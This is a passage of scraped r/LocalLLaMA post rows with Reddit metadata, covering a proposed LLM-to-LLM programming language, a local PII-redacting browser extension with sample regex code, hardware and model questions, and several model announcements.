'https://external-preview.redd.it/aDd0MG8wczN6dmlnMarrnhoRDFUm0baQWTGT_UocziHYnRfcPAE_9rBN0UXz.png?width=320&crop=smart&format=pjpg&auto=webp&s=6ab7b6142c67ad5c4bc1f120e74621821b84f406', 'width': 320}, {'height': 409, 'url': 
'https://external-preview.redd.it/aDd0MG8wczN6dmlnMarrnhoRDFUm0baQWTGT_UocziHYnRfcPAE_9rBN0UXz.png?width=640&crop=smart&format=pjpg&auto=webp&s=3d35e762214e5ddd90f9c87e30a4411de2c141b5', 'width': 640}, {'height': 614, 'url': 'https://external-preview.redd.it/aDd0MG8wczN6dmlnMarrnhoRDFUm0baQWTGT_UocziHYnRfcPAE_9rBN0UXz.png?width=960&crop=smart&format=pjpg&auto=webp&s=25ec89eeaf8565eabd481a51431fdd30906fad0f', 'width': 960}, {'height': 691, 'url': 'https://external-preview.redd.it/aDd0MG8wczN6dmlnMarrnhoRDFUm0baQWTGT_UocziHYnRfcPAE_9rBN0UXz.png?width=1080&crop=smart&format=pjpg&auto=webp&s=b6ea335d95e1874e773790f1e44bd23fef059372', 'width': 1080}], 'source': {'height': 1080, 'url': 'https://external-preview.redd.it/aDd0MG8wczN6dmlnMarrnhoRDFUm0baQWTGT_UocziHYnRfcPAE_9rBN0UXz.png?format=pjpg&auto=webp&s=78fa4c72171b28412e0507b6514cf4f75c43d216', 'width': 1686}, 'variants': {}}]} | |
A compiled programming language for LLM-to-LLM communication - neutral to negative on single models, but appears to be transformative in multi-model mesh. | 0 | I’m a systems researcher (PhD, 30+ publications) with a health background who spent a career as a data analyst. Last year I dove into AI hard, focusing on multi-model meshes and model to model communication. This paper describes Kernel Language (KL), a compiled programming language for LLMs to communicate with each other, not humans.
The problem: almost all multi-agent frameworks use natural language for agent communication. But natural language is lossy, and so much drift occurs when multiple models work on the same task that you are usually better off using a single agent per task, which creates a quality ceiling.
KL gets around this by replacing the primary communication medium with a compiled language built on a kernel periodic table (80 families comprising 577 reasoning primitives, covering optimization, inference, learning, creativity, mathematical proofs, etc.). A compiler rejects any model output that doesn’t meet the language specification, but it ignores comments - and this is key. Models can and do read the comment layer, so you get the logical rigor of a compiled language and the nuance of natural language at the same time.
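To make that design concrete, here is a toy checker in the same spirit (the grammar below is invented for illustration, not KL's actual specification): statements must match a strict format, while `#` comment lines pass through unchecked.

```python
import re

# Toy "compiled" format: each statement must be OP(arg, ...) or it is rejected.
STMT = re.compile(r"^[A-Z_]+\([\w\s,\.]*\)$")

def compile_check(program: str) -> bool:
    """Return True if every non-comment line matches the toy grammar.
    Lines starting with '#' are comments: ignored by the checker,
    but still visible to a model reading the program."""
    for line in program.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # comment layer: free-form natural language
        if not STMT.match(line):
            return False
    return True

ok = """# strengthen the proof before emitting
INFER(lemma_1, lemma_2)
OPTIMIZE(cost, 0.95)"""
bad = "please optimize the cost somehow"

print(compile_check(ok), compile_check(bad))  # -> True False
```

The point of the split is that the checker gives you hard guarantees about the statement layer while leaving the comment layer as an un-enforced side channel for nuance.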
We tested KL vs natural language on frontier models, mid-sized open source models, and small open source models, individually, as well as a multi-mesh of the frontier models, on two unrelated complex problems. The result that surprised us, KL is neutral to slightly negative for individual frontier models working solo, and slightly negative for mid sized models, and crushing for small models.. They trade creativity for logical rigor (or in the case of small models, collapse). But for multi-mesh coordination of frontier models, it was transformative. The KL enabled mesh produced the highest quality output across all other modalities, including emergent capabilities (adversarial self critique and iterative proof strengthening) that no solo model produced on its own in either modality (or the natural language mesh).
The test battery is small (six conditions, twelve total responses), which I am up front about in the paper. But the effect replicated across two unrelated domains, which is encouraging. The implication is that the communication medium is as important as the models themselves, and natural language is both a bottleneck and a necessity.
If interested in looking over the study, here is the link to the white paper: [https://sifsystemsmcrd.com/KL\_White\_Paper.pdf](https://sifsystemsmcrd.com/KL_White_Paper.pdf)
Would love to hear feedback. Thank you. | 2026-02-11T15:41:21 | https://www.reddit.com/r/LocalLLaMA/comments/1r20pio/a_compiled_programming_language_for_llmtollm/ | Repulsive-Two6317 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r20pio | false | null | t3_1r20pio | /r/LocalLLaMA/comments/1r20pio/a_compiled_programming_language_for_llmtollm/ | false | false | self | 0 | null |
[Release] Q-Lite: Ultra-lightweight LLM gateway (69KB, runs on ESP32/Pico/STM32) | 1 | [removed] | 2026-02-11T15:36:03 | https://www.reddit.com/r/LocalLLaMA/comments/1r20kii/release_qlite_ultralightweight_llm_gateway_69kb/ | RalpBigBear | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r20kii | false | null | t3_1r20kii | /r/LocalLLaMA/comments/1r20kii/release_qlite_ultralightweight_llm_gateway_69kb/ | false | false | self | 1 | {'enabled': False, 'images': [{'id': 'vC0havPtyOydfKW2M3cWbVG4G_tzgcEn5qLClUD_xbE', 'resolutions': [{'height': 54, 'url': 'https://external-preview.redd.it/vC0havPtyOydfKW2M3cWbVG4G_tzgcEn5qLClUD_xbE.png?width=108&crop=smart&auto=webp&s=10b13a8d9118c8f1af2e9fd75086b9a2b5cc41dd', 'width': 108}, {'height': 108, 'url': 'https://external-preview.redd.it/vC0havPtyOydfKW2M3cWbVG4G_tzgcEn5qLClUD_xbE.png?width=216&crop=smart&auto=webp&s=e1e46f4fc2e33e11f84d2a0b3004229c99d9eb5a', 'width': 216}, {'height': 160, 'url': 'https://external-preview.redd.it/vC0havPtyOydfKW2M3cWbVG4G_tzgcEn5qLClUD_xbE.png?width=320&crop=smart&auto=webp&s=7950c8d96cead3ba59ab189c62becffe5bb31b1e', 'width': 320}, {'height': 320, 'url': 'https://external-preview.redd.it/vC0havPtyOydfKW2M3cWbVG4G_tzgcEn5qLClUD_xbE.png?width=640&crop=smart&auto=webp&s=0ca2576200d3226d5b44788127c41d4c8da8246a', 'width': 640}, {'height': 480, 'url': 'https://external-preview.redd.it/vC0havPtyOydfKW2M3cWbVG4G_tzgcEn5qLClUD_xbE.png?width=960&crop=smart&auto=webp&s=e8dc69286a3240eb2a48ae29404fdb4f40fc7b47', 'width': 960}, {'height': 540, 'url': 'https://external-preview.redd.it/vC0havPtyOydfKW2M3cWbVG4G_tzgcEn5qLClUD_xbE.png?width=1080&crop=smart&auto=webp&s=9b7041c3b0598a8d79c245f9305208c854ecdfa5', 'width': 1080}], 'source': {'height': 600, 'url': 'https://external-preview.redd.it/vC0havPtyOydfKW2M3cWbVG4G_tzgcEn5qLClUD_xbE.png?auto=webp&s=3e54286c8881a3670507e35d8703c131e786a25f', 'width': 1200}, 'variants': {}}]} |
I'm a garlic farmer with no PC — I had AIs build a rough security gate for OpenClaw from my phone. 171 tests passed (sandbox). | 1 | [removed] | 2026-02-11T15:35:35 | https://www.reddit.com/r/LocalLLaMA/comments/1r20k2v/im_a_garlic_farmer_with_no_pc_i_had_ais_build_a/ | amadale | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r20k2v | false | null | t3_1r20k2v | /r/LocalLLaMA/comments/1r20k2v/im_a_garlic_farmer_with_no_pc_i_had_ais_build_a/ | false | false | self | 1 | {'enabled': False, 'images': [{'id': 'BfjyCn6CzN8PQQImI976uTwVuuLCP3_lcIwslOoXhTg', 'resolutions': [{'height': 56, 'url': 'https://external-preview.redd.it/BfjyCn6CzN8PQQImI976uTwVuuLCP3_lcIwslOoXhTg.png?width=108&crop=smart&auto=webp&s=210969840104fefe5a740c14a049ba6ae9f4da1a', 'width': 108}, {'height': 113, 'url': 'https://external-preview.redd.it/BfjyCn6CzN8PQQImI976uTwVuuLCP3_lcIwslOoXhTg.png?width=216&crop=smart&auto=webp&s=4884c88257a74f96353b7ca71d7749b6b7408185', 'width': 216}, {'height': 168, 'url': 'https://external-preview.redd.it/BfjyCn6CzN8PQQImI976uTwVuuLCP3_lcIwslOoXhTg.png?width=320&crop=smart&auto=webp&s=6767f329a451c7b10e4b36109b3f7ce919c6c511', 'width': 320}, {'height': 336, 'url': 'https://external-preview.redd.it/BfjyCn6CzN8PQQImI976uTwVuuLCP3_lcIwslOoXhTg.png?width=640&crop=smart&auto=webp&s=bcb0d160a488e8838d6bd1de9314d5614095d98a', 'width': 640}, {'height': 504, 'url': 'https://external-preview.redd.it/BfjyCn6CzN8PQQImI976uTwVuuLCP3_lcIwslOoXhTg.png?width=960&crop=smart&auto=webp&s=d51c3521f7164a737cdf1eaf37fe880d9b4b6f45', 'width': 960}, {'height': 567, 'url': 'https://external-preview.redd.it/BfjyCn6CzN8PQQImI976uTwVuuLCP3_lcIwslOoXhTg.png?width=1080&crop=smart&auto=webp&s=4d3aa798813a7bdaf4f1915a05cc71f6345b0d17', 'width': 1080}], 'source': {'height': 630, 'url': 'https://external-preview.redd.it/BfjyCn6CzN8PQQImI976uTwVuuLCP3_lcIwslOoXhTg.png?auto=webp&s=ee4222e7ba222f9a3ab6fecbcc8435b9c9c571aa', 'width': 1200}, 'variants': {}}]} |
Mini AI Machine | 60 | I do a lot of text processing & generation on small model. RTX 4000 Blackwell SFF (75W max) + 32GB DDR5 + DeskMeet 8L PC running PopOS and vLLM 🎉
Anyone else has mini AI rig? | 2026-02-11T15:14:31 | KnownAd4832 | i.redd.it | 1970-01-01T00:00:00 | 0 | {} | 1r2005l | false | null | t3_1r2005l | /r/LocalLLaMA/comments/1r2005l/mini_ai_machine/ | false | false | default | 60 | {'enabled': True, 'images': [{'id': '4vmjqryjtvig1', 'resolutions': [{'height': 144, 'url': 'https://preview.redd.it/4vmjqryjtvig1.jpeg?width=108&crop=smart&auto=webp&s=c2dadfcc9cd38c33aea2a00d57988c64d0975d51', 'width': 108}, {'height': 288, 'url': 'https://preview.redd.it/4vmjqryjtvig1.jpeg?width=216&crop=smart&auto=webp&s=893be2e80a8a24ddf581dd78bd6ff9ccf3757758', 'width': 216}, {'height': 426, 'url': 'https://preview.redd.it/4vmjqryjtvig1.jpeg?width=320&crop=smart&auto=webp&s=1e50181eba146eed49d0853aed23cb9e9ec577b7', 'width': 320}, {'height': 853, 'url': 'https://preview.redd.it/4vmjqryjtvig1.jpeg?width=640&crop=smart&auto=webp&s=c30c9580fd072df0983a74667d5a2fb1848c656e', 'width': 640}, {'height': 1280, 'url': 'https://preview.redd.it/4vmjqryjtvig1.jpeg?width=960&crop=smart&auto=webp&s=752d7e8e36e14935beb7aaaad651f8f112123d50', 'width': 960}, {'height': 1440, 'url': 'https://preview.redd.it/4vmjqryjtvig1.jpeg?width=1080&crop=smart&auto=webp&s=835aefb4117f89722713bb4746851eeeb3687b9d', 'width': 1080}], 'source': {'height': 5712, 'url': 'https://preview.redd.it/4vmjqryjtvig1.jpeg?auto=webp&s=02384e81f26ff581e7597112b44185e3e2ef6bfc', 'width': 4284}, 'variants': {}}]} | |
Are you guys using tools for AI Agent observability and cost tracking? | 2 | I'm currently working on pivoting my startup to tackle this specific market, but I want to get an idea of how people are currently controlling their agents' performance and token costs.
Is this in common use? | 2026-02-11T15:07:54 | https://www.reddit.com/r/LocalLLaMA/comments/1r1ztwk/are_you_guys_using_tools_for_ai_agent/ | UcreiziDog | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1ztwk | false | null | t3_1r1ztwk | /r/LocalLLaMA/comments/1r1ztwk/are_you_guys_using_tools_for_ai_agent/ | false | false | self | 2 | null |
[Showcase] I built a browser-based "Privacy Firewall" for LLMs using Rust + WASM (works with Ollama) | 0 | # Sunder – A local privacy firewall for AI chats (Rust/WASM Chrome Extension)
Hey everyone,
Like many of you, I use LLMs daily — but I've always been uneasy about pasting sensitive data (emails, client names, transaction IDs) into cloud providers like OpenAI or Anthropic. Even with "privacy mode" toggled on, I don't fully trust what happens on the other side.
So I built **Sunder**: a Chrome extension that acts as a local privacy firewall between you and any AI chat interface.
## How it works
Sunder follows a **zero-trust** model — it assumes every provider will store your input, and strips sensitive data before it ever leaves your browser.
1. **Intercept** — You type normally. Sunder catches your input before it hits the network.
2. **Protect** — It runs pattern matching locally (Rust compiled to WASM) and swaps sensitive values for tokens:
- `john.doe@gmail.com` → `[EMAIL_1]`
- `$50,000` → `[MONEY_1]`
- `4242 4242 4242 4242` → `[CARD_1]`
3. **Send** — The LLM receives the sanitized prompt. It has full context, but zero PII.
4. **Reveal** — When the response comes back ("Draft an email to [EMAIL_1]…"), Sunder swaps the real values back in — entirely locally.
The AI never sees your actual data. You never lose context.
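The tokenize-and-restore flow above can be sketched in a few lines. This is a hypothetical Python illustration of the idea only (the real engine is Rust compiled to WASM, and `protect`/`reveal` are made-up names, not Sunder's actual API):

```python
import re

# Illustrative patterns only; the real extension's rules are more thorough.
PATTERNS = {
    "EMAIL": re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+"),
    "MONEY": re.compile(r"\$[\d,]+(?:\.\d{2})?"),
    "CARD": re.compile(r"\b(?:\d{4}[ -]?){3}\d{4}\b"),
}

def protect(text):
    """Replace PII with numbered tokens; return sanitized text plus a vault."""
    vault = {}
    counters = {}
    for label, pattern in PATTERNS.items():
        def repl(match):
            counters[label] = counters.get(label, 0) + 1
            token = f"[{label}_{counters[label]}]"
            vault[token] = match.group(0)  # kept in memory only, never sent
            return token
        text = pattern.sub(repl, text)
    return text, vault

def reveal(text, vault):
    """Swap tokens in the model's response back to the real values."""
    for token, value in vault.items():
        text = text.replace(token, value)
    return text

safe, vault = protect("Email john.doe@gmail.com about the $50,000 invoice")
print(safe)                 # Email [EMAIL_1] about the [MONEY_1] invoice
print(reveal(safe, vault))  # original text restored
```

The vault here is a plain in-memory dict, mirroring the Identity Vault idea: it lives only for the round trip and is never serialized or sent anywhere.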
## Tech stack
- **Core engine:** Rust → WebAssembly (fast, no network calls, runs in-browser)
- **Extension:** Plasmo (React-based Chrome extension framework)
- **Storage:** 100% local — an in-memory "Identity Vault" that never touches a server
## What it supports today
The extension currently works on **ChatGPT, Claude, Gemini, Perplexity, DeepSeek, and Copilot**. I also added a local dashboard with **Ollama** support, so you can go fully air-gapped if you want — local model + local privacy layer.
## Where I need help 🦀
I'm not a seasoned Rust developer. The current MVP handles regex-based patterns (emails, dates, money, cards) well, but I'm struggling with efficient **Named Entity Recognition (NER)** in WASM — catching names and other contextual PII without blowing up the binary size.
If you're into Rust, privacy engineering, or browser extensions, I'd love for you to roast my code or contribute. PRs, issues, and ideas are all welcome.
## Links
- **GitHub:** [github.com/awixor/sunder-ai](https://github.com/awixor/sunder-ai)
- **Live demo:** [sunder-ai-dashboard.vercel.app](https://sunder-ai-dashboard.vercel.app/)
Would you use something like this? Or am I over-engineering my paranoia?
| 2026-02-11T14:56:18 | https://www.reddit.com/r/LocalLLaMA/comments/1r1zj0b/showcase_i_built_a_browserbased_privacy_firewall/ | AWX-Houcine | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1zj0b | false | null | t3_1r1zj0b | /r/LocalLLaMA/comments/1r1zj0b/showcase_i_built_a_browserbased_privacy_firewall/ | false | false | self | 0 | {'enabled': False, 'images': [{'id': 'c9FAjaAcJR5mjS1cVoh3rTOSj42q7g18vxJCPG-xn-E', 'resolutions': [{'height': 54, 'url': 'https://external-preview.redd.it/c9FAjaAcJR5mjS1cVoh3rTOSj42q7g18vxJCPG-xn-E.png?width=108&crop=smart&auto=webp&s=615e57d824e3032f4481ddd96bdb53042e33f16b', 'width': 108}, {'height': 108, 'url': 'https://external-preview.redd.it/c9FAjaAcJR5mjS1cVoh3rTOSj42q7g18vxJCPG-xn-E.png?width=216&crop=smart&auto=webp&s=1bd77602747beb9ba912a8d4629959f758c7e8de', 'width': 216}, {'height': 160, 'url': 'https://external-preview.redd.it/c9FAjaAcJR5mjS1cVoh3rTOSj42q7g18vxJCPG-xn-E.png?width=320&crop=smart&auto=webp&s=cfd97b8cdf5306b4a3065b2a3fbd37ed203b553d', 'width': 320}, {'height': 320, 'url': 'https://external-preview.redd.it/c9FAjaAcJR5mjS1cVoh3rTOSj42q7g18vxJCPG-xn-E.png?width=640&crop=smart&auto=webp&s=8a694a4ccca1fee5bc585108ddab4121ecc19d47', 'width': 640}, {'height': 480, 'url': 'https://external-preview.redd.it/c9FAjaAcJR5mjS1cVoh3rTOSj42q7g18vxJCPG-xn-E.png?width=960&crop=smart&auto=webp&s=6088869235e76d4498e7eb7af2fc188f5777e8c3', 'width': 960}, {'height': 540, 'url': 'https://external-preview.redd.it/c9FAjaAcJR5mjS1cVoh3rTOSj42q7g18vxJCPG-xn-E.png?width=1080&crop=smart&auto=webp&s=d6dbd832774c437399371cc6570714f10dc9b101', 'width': 1080}], 'source': {'height': 600, 'url': 'https://external-preview.redd.it/c9FAjaAcJR5mjS1cVoh3rTOSj42q7g18vxJCPG-xn-E.png?auto=webp&s=0797147f28d7526abd0286472f1eab8ac7607516', 'width': 1200}, 'variants': {}}]} |
Anyone running Qwen3 VL embeddings? | 6 | So I've been trying to get the Qwen3 VL Embedding 2B model running locally with vLLM following the official instructions and I'm kinda confused by the vram usage. On my 4090 it's eating up 20+ gb even with a small 8k context window which seems insane for a 2B model. For comparison I can run qwen3 vl 4b through ollama with a bigger context window and it uses way less vram. Has anyone actually gotten this model running efficiently? I feel like I'm missing something obvious here. Also wondering if there's any way to quantize it to Q4 or Q8 right now? I've looked around and can't find any proper quants besides an FP8 and some GGUFs that didn’t really work for me. LLM compressor doesn’t seem to have support for it. | 2026-02-11T14:53:56 | https://www.reddit.com/r/LocalLLaMA/comments/1r1zguk/anyone_running_qwen3_vl_embeddings/ | neeeser | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1zguk | false | null | t3_1r1zguk | /r/LocalLLaMA/comments/1r1zguk/anyone_running_qwen3_vl_embeddings/ | false | false | self | 6 | null |
Dialogue Speech Generation: MOSS-TTSD-v1.0 vs Eleven v3 | 7 | 2026-02-11T14:53:24 | https://v.redd.it/3evtav0rpvig1 | Xiami2019 | v.redd.it | 1970-01-01T00:00:00 | 0 | {} | 1r1zgci | false | {'reddit_video': {'bitrate_kbps': 5000, 'dash_url': 'https://v.redd.it/3evtav0rpvig1/DASHPlaylist.mpd?a=1773413619%2CNzFiMGE0MjBkZTU4MzE2YjgwYmE3NWU2ZGNjYjdkMjQ0OGYzN2Y2MDNlNmIxYzI2MjY2YTIzNTk3OGEyNzAzOQ%3D%3D&v=1&f=sd', 'duration': 51, 'fallback_url': 'https://v.redd.it/3evtav0rpvig1/CMAF_1080.mp4?source=fallback', 'has_audio': True, 'height': 1080, 'hls_url': 'https://v.redd.it/3evtav0rpvig1/HLSPlaylist.m3u8?a=1773413619%2CZjNjZTFhMTFhYWM1MzU3ZDI1YTEyYTVhZTBmYWQyYTk5NzNlMDE0NDcxZDIzYjA2ZjczYTA3NzUzOTNmMjk2NA%3D%3D&v=1&f=sd', 'is_gif': False, 'scrubber_media_url': 'https://v.redd.it/3evtav0rpvig1/CMAF_96.mp4', 'transcoding_status': 'completed', 'width': 1920}} | t3_1r1zgci | /r/LocalLLaMA/comments/1r1zgci/dialogue_speech_generation_mossttsdv10_vs_eleven/ | false | false | 7 | {'enabled': False, 'images': [{'id': 'ejRlOG95MHJwdmlnMVFhJm_PiKiI8x7PERjm_WAjTrNX14dQowUqoP4K2Z_H', 'resolutions': [{'height': 60, 'url': 'https://external-preview.redd.it/ejRlOG95MHJwdmlnMVFhJm_PiKiI8x7PERjm_WAjTrNX14dQowUqoP4K2Z_H.png?width=108&crop=smart&format=pjpg&auto=webp&s=ff870cf63543f07cd567a08c5efc4e816bcb1b63', 'width': 108}, {'height': 121, 'url': 'https://external-preview.redd.it/ejRlOG95MHJwdmlnMVFhJm_PiKiI8x7PERjm_WAjTrNX14dQowUqoP4K2Z_H.png?width=216&crop=smart&format=pjpg&auto=webp&s=c79ca6b0ceacac2a8320c52f7b803fcb8c3f3b26', 'width': 216}, {'height': 180, 'url': 'https://external-preview.redd.it/ejRlOG95MHJwdmlnMVFhJm_PiKiI8x7PERjm_WAjTrNX14dQowUqoP4K2Z_H.png?width=320&crop=smart&format=pjpg&auto=webp&s=e9cf85a7e1550bfc0212ffabc417e228a09c09ac', 'width': 320}, {'height': 360, 'url': 'https://external-preview.redd.it/ejRlOG95MHJwdmlnMVFhJm_PiKiI8x7PERjm_WAjTrNX14dQowUqoP4K2Z_H.png?width=640&crop=smart&format=pjpg&auto=webp&s=fcc7aa4537c158a1612e4483184c741100bbce84', 'width': 640}, 
{'height': 540, 'url': 'https://external-preview.redd.it/ejRlOG95MHJwdmlnMVFhJm_PiKiI8x7PERjm_WAjTrNX14dQowUqoP4K2Z_H.png?width=960&crop=smart&format=pjpg&auto=webp&s=871afcb8b54e3a475ae945cc7901a11f53faecc8', 'width': 960}, {'height': 607, 'url': 'https://external-preview.redd.it/ejRlOG95MHJwdmlnMVFhJm_PiKiI8x7PERjm_WAjTrNX14dQowUqoP4K2Z_H.png?width=1080&crop=smart&format=pjpg&auto=webp&s=b0fc77fe8d929968cac2d0c6050ce62476db68c9', 'width': 1080}], 'source': {'height': 1080, 'url': 'https://external-preview.redd.it/ejRlOG95MHJwdmlnMVFhJm_PiKiI8x7PERjm_WAjTrNX14dQowUqoP4K2Z_H.png?format=pjpg&auto=webp&s=8ce8630cdc677370cd304c6ff1640e85c67bbe8d', 'width': 1920}, 'variants': {}}]} | ||
What is the best AMD GPU that can run a 2B model? | 1 | I want to run these models on 3 GPUs the fastest way possible
Qwen3-TTS--1.7B--
Qwen3--1.7B-- on vllm
My2.5
Best AMD GPU? | 2026-02-11T14:52:30 | https://www.reddit.com/r/LocalLLaMA/comments/1r1zfj7/what_are_the_best_amd_thta_can_run_2b_model/ | Quiet_Dasy | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1zfj7 | false | null | t3_1r1zfj7 | /r/LocalLLaMA/comments/1r1zfj7/what_are_the_best_amd_thta_can_run_2b_model/ | false | false | self | 1 | null |
GLM 5 said it's Gemini | 0 | I saw the latest release post and decided to ask it a simple question, to which it replied that it's Gemini. Then I retried and it replied correctly.
https://preview.redd.it/4fnlf24aovig1.png?width=2654&format=png&auto=webp&s=b78e73059cc71078de0ef662b583d1bca2f8b0c4
| 2026-02-11T14:45:20 | https://www.reddit.com/r/LocalLLaMA/comments/1r1z8zp/glm_5_said_its_gemini/ | Resident-Ad-5419 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1z8zp | false | null | t3_1r1z8zp | /r/LocalLLaMA/comments/1r1z8zp/glm_5_said_its_gemini/ | false | false | 0 | null | |
MiniMax M2.5 Coming Soon... | 29 | 2026-02-11T14:37:25 | Difficult-Cap-7527 | i.redd.it | 1970-01-01T00:00:00 | 0 | {} | 1r1z1wp | false | null | t3_1r1z1wp | /r/LocalLLaMA/comments/1r1z1wp/minimax_m25_coming_soon/ | false | false | 29 | {'enabled': True, 'images': [{'id': 'zlko1raxmvig1', 'resolutions': [{'height': 131, 'url': 'https://preview.redd.it/zlko1raxmvig1.jpeg?width=108&crop=smart&auto=webp&s=04951029341ceb2bd97dc92b3c3193078993cd65', 'width': 108}, {'height': 263, 'url': 'https://preview.redd.it/zlko1raxmvig1.jpeg?width=216&crop=smart&auto=webp&s=21d3e2e97a4364cc38de51cf2c5c49b3f88bbc64', 'width': 216}, {'height': 390, 'url': 'https://preview.redd.it/zlko1raxmvig1.jpeg?width=320&crop=smart&auto=webp&s=54c4f5c81b13ee4c37f25eb424262c1a65293fd4', 'width': 320}, {'height': 780, 'url': 'https://preview.redd.it/zlko1raxmvig1.jpeg?width=640&crop=smart&auto=webp&s=294b5efdef1efac438659373aca5f13743e0b1e6', 'width': 640}, {'height': 1170, 'url': 'https://preview.redd.it/zlko1raxmvig1.jpeg?width=960&crop=smart&auto=webp&s=48dea2842cef744641c597872b54d405985f59d7', 'width': 960}, {'height': 1316, 'url': 'https://preview.redd.it/zlko1raxmvig1.jpeg?width=1080&crop=smart&auto=webp&s=26cd408fec1dd08a56330fbd237ebe096d937c76', 'width': 1080}], 'source': {'height': 1463, 'url': 'https://preview.redd.it/zlko1raxmvig1.jpeg?auto=webp&s=fa5c8ceef2cf03d46f5c4706574ea2ca1476f5ca', 'width': 1200}, 'variants': {}}]} | |||
Epstein RAG+Heretic-LLM on 25303 Epstein files | 4 | It's running on colab's free tier, will be up for \~6 hours
[https://pro-pug-powerful.ngrok-free.app/](https://pro-pug-powerful.ngrok-free.app/)
https://preview.redd.it/fit9p5wkmvig1.png?width=1784&format=png&auto=webp&s=dff535539c3fa5b5324c007efb7f83faa4a79933
Source: [https://www.reddit.com/r/LocalLLaMA/comments/1ozu5v4/20000\_epstein\_files\_in\_a\_single\_text\_file/](https://www.reddit.com/r/LocalLLaMA/comments/1ozu5v4/20000_epstein_files_in_a_single_text_file/) | 2026-02-11T14:36:41 | https://www.reddit.com/r/LocalLLaMA/comments/1r1z1aj/epstein_raghereticllm_on_25303_epstein_files/ | Basel_Ashraf_Fekry | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1z1aj | false | null | t3_1r1z1aj | /r/LocalLLaMA/comments/1r1z1aj/epstein_raghereticllm_on_25303_epstein_files/ | false | false | 4 | null | |
MOSS-TTS with Best Discrete Audio Tokenizer | 3 | The best open-source discrete audio tokenizer you can find.
[https://github.com/OpenMOSS/MOSS-Audio-Tokenizer](https://github.com/OpenMOSS/MOSS-Audio-Tokenizer) | 2026-02-11T14:34:10 | https://www.reddit.com/r/LocalLLaMA/comments/1r1yz0j/mosstts_with_best_discret_audio_tokenizer/ | Xiami2019 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1yz0j | false | null | t3_1r1yz0j | /r/LocalLLaMA/comments/1r1yz0j/mosstts_with_best_discret_audio_tokenizer/ | false | false | self | 3 | {'enabled': False, 'images': [{'id': 'hN8pUnt2TgFs44QWWN4JWF7tqsp7LbEzoHVfIIbbd2A', 'resolutions': [{'height': 54, 'url': 'https://external-preview.redd.it/hN8pUnt2TgFs44QWWN4JWF7tqsp7LbEzoHVfIIbbd2A.png?width=108&crop=smart&auto=webp&s=3ae011eb7590f66d56a0a9ef48d40d89e4b7037b', 'width': 108}, {'height': 108, 'url': 'https://external-preview.redd.it/hN8pUnt2TgFs44QWWN4JWF7tqsp7LbEzoHVfIIbbd2A.png?width=216&crop=smart&auto=webp&s=78d8739ccba0ef365562e09893a550cb0d4a4262', 'width': 216}, {'height': 160, 'url': 'https://external-preview.redd.it/hN8pUnt2TgFs44QWWN4JWF7tqsp7LbEzoHVfIIbbd2A.png?width=320&crop=smart&auto=webp&s=b37fd729efc92efa0a9bf969e61cd7aacc1e84c5', 'width': 320}, {'height': 320, 'url': 'https://external-preview.redd.it/hN8pUnt2TgFs44QWWN4JWF7tqsp7LbEzoHVfIIbbd2A.png?width=640&crop=smart&auto=webp&s=6518631d740a68906393414a7a0c6e1130abc156', 'width': 640}, {'height': 480, 'url': 'https://external-preview.redd.it/hN8pUnt2TgFs44QWWN4JWF7tqsp7LbEzoHVfIIbbd2A.png?width=960&crop=smart&auto=webp&s=31aa3bd303834fa9590dde223428dbfc1c2b9fde', 'width': 960}, {'height': 540, 'url': 'https://external-preview.redd.it/hN8pUnt2TgFs44QWWN4JWF7tqsp7LbEzoHVfIIbbd2A.png?width=1080&crop=smart&auto=webp&s=3d7132d84d27cfbb5144301b978d98110176c60a', 'width': 1080}], 'source': {'height': 600, 'url': 'https://external-preview.redd.it/hN8pUnt2TgFs44QWWN4JWF7tqsp7LbEzoHVfIIbbd2A.png?auto=webp&s=7f5ed31236039f4615867a8fbb3f2b07b20ff00f', 'width': 1200}, 'variants': {}}]} |
LMAO! Qwen developer accidentally leaked the internal model name in the "DEMO3" video! | 1 | [removed] | 2026-02-11T14:31:19 | Elegant_Mulberry4946 | i.redd.it | 1970-01-01T00:00:00 | 0 | {} | 1r1ywe5 | false | null | t3_1r1ywe5 | /r/LocalLLaMA/comments/1r1ywe5/lmao_qwen_developer_accidentally_leaked_the/ | true | false | spoiler | 1 | {'enabled': True, 'images': [{'id': 'ybpj4a5tlvig1', 'resolutions': [{'height': 34, 'url': 'https://preview.redd.it/ybpj4a5tlvig1.png?width=108&crop=smart&auto=webp&s=2d6ed4ef5d1a9d3895011db9efac0ab8e23ebf87', 'width': 108}, {'height': 69, 'url': 'https://preview.redd.it/ybpj4a5tlvig1.png?width=216&crop=smart&auto=webp&s=bd11932543516ea0d9160b8651cdf372431da13b', 'width': 216}, {'height': 103, 'url': 'https://preview.redd.it/ybpj4a5tlvig1.png?width=320&crop=smart&auto=webp&s=bd25f7abe39219ef8cc4fb9ef77fbf879814090d', 'width': 320}, {'height': 206, 'url': 'https://preview.redd.it/ybpj4a5tlvig1.png?width=640&crop=smart&auto=webp&s=def12a5019ba15819c9f032f6b9dcf6be4ddd27e', 'width': 640}], 'source': {'height': 246, 'url': 'https://preview.redd.it/ybpj4a5tlvig1.png?auto=webp&s=2fb700e5812e2a8a11871bb7831d7c4d5f37ee3e', 'width': 761}, 'variants': {'obfuscated': {'resolutions': [{'height': 34, 'url': 'https://preview.redd.it/ybpj4a5tlvig1.png?width=108&crop=smart&blur=10&format=pjpg&auto=webp&s=d6a5594a293c58bce7da4b983f29f81d842a1538', 'width': 108}, {'height': 69, 'url': 'https://preview.redd.it/ybpj4a5tlvig1.png?width=216&crop=smart&blur=21&format=pjpg&auto=webp&s=e0c3c649542ab58d2c6c380b4d2fb0524aee3165', 'width': 216}, {'height': 103, 'url': 'https://preview.redd.it/ybpj4a5tlvig1.png?width=320&crop=smart&blur=32&format=pjpg&auto=webp&s=c9d88d6f98ebf69740d929c87fc0012972cc7971', 'width': 320}, {'height': 206, 'url': 